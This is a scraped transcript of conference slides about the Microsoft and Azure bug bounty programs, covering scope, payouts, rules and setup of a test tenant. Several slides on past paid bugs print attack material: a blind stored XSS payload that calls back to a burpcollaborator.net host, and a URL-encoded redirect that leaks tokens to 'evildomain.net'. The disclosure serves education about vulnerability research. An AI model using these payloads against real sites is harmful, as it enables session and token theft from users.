1 / 53

Michael Hendrickx (@ ndrix ) Akila Srinivasan (@akilsrin)

How to be successful in the Azure bug bounty and The Microsoft Bounty Program overview. Michael Hendrickx (@ ndrix ) Akila Srinivasan (@akilsrin). Agenda. Azure Attack Surface Azure Bug Bounty background Past bounty payouts Overall and Azure Bug Bounty scope

mallorymiller
Download Presentation

Michael Hendrickx (@ ndrix ) Akila Srinivasan (@akilsrin)

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. How to be successful in the Azure bug bounty and The Microsoft Bounty Program overview Michael Hendrickx (@ndrix) Akila Srinivasan (@akilsrin)

  2. Agenda • Azure Attack Surface • Azure Bug Bounty background • Past bounty payouts • Overall and Azure Bug Bounty scope • Get cracking : Azure offers / How to get started =  +

  3. Azure Attack Surface Multiple tenants VM scale sets App Deploy Batch apps User Management WebApps VM’s User Self-Services SQL Mobile Apps VM Marketplace NoSQL Workers Storage: queue, table, blobs, … Cache Virtual networks Backup 2FA Gateways CDN Load balancing Media Services Network security groups OnPrem Apps Data center Federated identity

  4. Azure Bug Bounty Background • In April 2015 we started this bounty program to give researchers and customers an easy way to pentest their Azure subscriptions • We’ve expanded the bounty since to include over 50 domains and endpoints

  5. Microsoft Bounty Programs Old and New

  6. Launch of double bounties in Exchange online and Office 365 portal • The domains that will be receiving double rewards are: • portal.office.com • outlook.office365.com • outlook.office.com • outlook.live.com • *.outlook.com • Payout range is: $1,000 to $30,000 USD • Duration: March 1 to May 1, 2017 For additional information about this program: https://technet.microsoft.com/en-us/dn800983

  7. Microsoft Services Bounty Programs Old and New NEW Mitigation Bypass Bounty Microsoft O365 Azure June 2013 Apr 2015 Sept 2014

  8. Impact and Payouts For additional information about this program: https://technet.microsoft.com/en-us/mt797549.aspx

  9. Submit: Remote Code Execution (RCE) vulnerability for Microsoft Edge Bugs that lead to violation of W3C standardsthat compromise privacy and integrity of important user data The bugs must reproduce on the most recent Windows Insider Preview (WIP) slow build or Creator’s Update This continues our effort in finding bugs in earlier stages of development Program runs Aug 4, 2016 to May 15, 2017 RCE = $15,000 UXSS/Referer Spoofing/Compromise of privacy or integrity of user data = $6,000 Microsoft Edge Beta Web Platform Bounty (Part 2) For additional information about this program: https://technet.microsoft.com/en-us/mt761990.aspx

  10. .NET Core and ASP.NET Core Bug Bounty • Vulnerabilities in the latest available .NET builds • Program began September 1, 2016 (continuous) • All bugs have to reproduce in the latest beta or release candidates to qualify • Pays up to $15,000 USD For additional information about this program: https://technet.microsoft.com/en-us/mt764065

  11. Online Services Bug Bounty ProgramO365 + Azure • Earn bounty on submitted vulnerabilities for participating Online Services provided by Microsoft (O365 and Azure properties) • Vulnerability type examples • XSS • CSRF • Unauthorized cross-tenant data tampering or access (for multi-tenant services) • Insecure direct object references • Injection Vulnerabilities • Authentication Vulnerabilities • Server-side Code Execution • Privilege Escalation • Significant Security Misconfiguration (when not caused by user) • Payout range is: $500 to $15,000 USD • Double bounty on exchange online and O365 portal for the next 2 months Follow us on the MSRC Blogs to get information on new bounties https://blogs.technet.microsoft.com/msrc/ For additional information about this program: https://technet.microsoft.com/en-us/dn800983

  12. Hyper-V Hyper-V escapes that will receive a bounty • Guest-to-Host • Guest-to-Guest • Guest-to-Host DoS (non-distributed, from a single guest) Total payout range is: Up to $100,000 USD For additional information about this program: https://technet.microsoft.com/en-us/dn425049

  13. Mitigation Bypass and Bounty for Defense A security mitigation improves on the security of our products Submit a novel mitigation bypass against our latest Windows platform, and/or a defense idea that would block an exploitation technique that currently bypasses the latest platform mitigations • Stack corruption (/GS, SEHOP, and SafeSEH) • Heap corruption (metadata integrity checks) • Code execution (DEP, CFG, ACG and ASLR) Total payout range is: Up to $200,000 (Mit. Bypass + Bounty for Defense) For additional information about this program: https://technet.microsoft.com/en-us/dn425049

  14. Past payouts • Highest payout bugs to date

  15. VNet Point to Site Auth Bypass • MSRC 34219 : Azure VNet Gateway Auth bypass • Azure VNet (Virtual Network) is your cloud based, logical network. • Your IP ranges, DNS servers, … • OnPrem connectivity using VNet Gateway over Secure Socket Tunneling Protocol (SSTP) • Specially crafted sequence of SSTP EAP-TLS messages during connection setup. • Tunnel TLS traffic over 443/tcp • Control packets within HTTPS session to setup SSTP state. • Gives access to virtual network, no credentials needed. $13k+ bug bounty paid

  16. Token leaking • MSRC 32377 : Token theft in redirect URL • URL encoding, convert %XX to corresponding character. https:%2f%2faccount.windowsazure.com%252f@evildomain.net -> https://account.windowsazure.com%2f@evildomain.net This is seen as username to log in to domain Evildomain.net will get the token, not account.windowsazure.com $13k bug bounty paid

  17. OAuth Authorization XSS • MSRC 31586 : XSS On OAuth authorization page. • Application name didn’t filter JS properly (MyApp) • Could initiate DOM actions (such as a button click). Login with Authorize MyApp to access:- account, email… Welcome Michael! OAuth Provider Yes No Yes $12k bug bounty paid

  18. Blind Stored XSS • MSRC 33555 : datamarket.azure.com XSS vulnerability • Used by backend engineers • “Pingback” to custom burpsuite domain. javascript%3a%2f*<%2fscript><svg%2fonload%3d'%2b%2f"%2f%2b%2fonmouseover%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f\%2fue73s5anaf53xull8bw0\.burpcollaborator.net%2f).replace(%2f\\%2fg%2c[]))%2f%2f'> <svg/onmouseover=1/+/[*/[]/+((new(Image)).src=([]+/\/ue73s5anaf53xull8bw0\.burpcollaborator.net/).replace(/\\/g,[]))//'> $2k bug bounty paid

  19. Insecure links • MSRC 33238 : HTTP links on account.microsoft.com • On secure https pages, some hyperlinks have a hardcoded scheme as “http://” links, rather than “https://” or “//” schemes. • Man in The Middle could redirect traffic flow $500 bug bounty paid

  20. Online Services Bug Bounty Program The highest bounties can be earned on: Authentication Vulnerabilities – Oauth, SAML 2.0 related bugs Privilege Escalations XSS and CSRF (on high traffic, high impact sites) For additional information about this program: https://technet.microsoft.com/en-us/dn800983

  21. In-Scope Domains

  22. In-Scope Domains (continued) List available on : https://technet.microsoft.com/en-us/security/dn800983

  23. Bug Bounty Out-Of-Scope • Out of scope domains* • User generated content • Testing outside of your own tenant • Any kinds of Denial of Service testing • High volume scanning • Moving beyond “Proof of concept” • Abusing gathered credentials • Phishing / Social engineering attacks

  24. Rewarding scheme • CVSS 3 Score to calculate bounty • Impacted targets • Bug affects users in same tenant or across tenants? • All users? • Bounty: • Cash payout + MSDN Credits + Azure Credits

  25. Horizontal Abuse vs Vertical Abuse • Horizontal Abuse : Access others’ resources • Vertical Abuse : Privilege escalation, authentication bypass Privilege level Fabric Admin Tenant Admin Tenant Admin App Admin App Admin App Admin User A User B User C User D User E User F Anonymous users

  26. Get cracking (no pun intended) • Azure offers: • Visual Studio / MSDN Subscription • $150 Azure credits / month • Free for one month ($200 credit) • 14 VM’s, 40 SQL DB’s, 8TB of storage, … • Redis caches, machine learning, Azure Active Directory • Keep going for free: • AAD, Machine learning, log analytics, virtual network, web/mobile apps, … https://azure.microsoft.com/en-us/free/

  27. So, how to we spin up Azure for testing?

  28. Card won’t be charged, in fact you need to manually enable it.

  29. The “old” portal, https://manage.windowsazure.com Also covered in bug bounty

  30. Adding users to your tenant.

  31. Adding enterprise applications to your tenant, can be done using different channels.

  32. Mitigation Bypass, Bounty for Defense and BlueHat Prize> $600,000 USD Online Services Bug Bounty > $400,000 USD Software Bounties > $200,000 USD Bounties Paid To Date

  33. Finder Appreciation and Retention (FAR) • For more information: • https://technet.microsoft.com/en-us/security/mt767986 • https://technet.microsoft.com/en-us/security/dn469163 • https://technet.microsoft.com/en-us/security/dn469163

  34. Making It To The MSRC Top 100 List • The severity, quality and quantity of the bugs you send determine your rank in the MSRC Top 100

More Related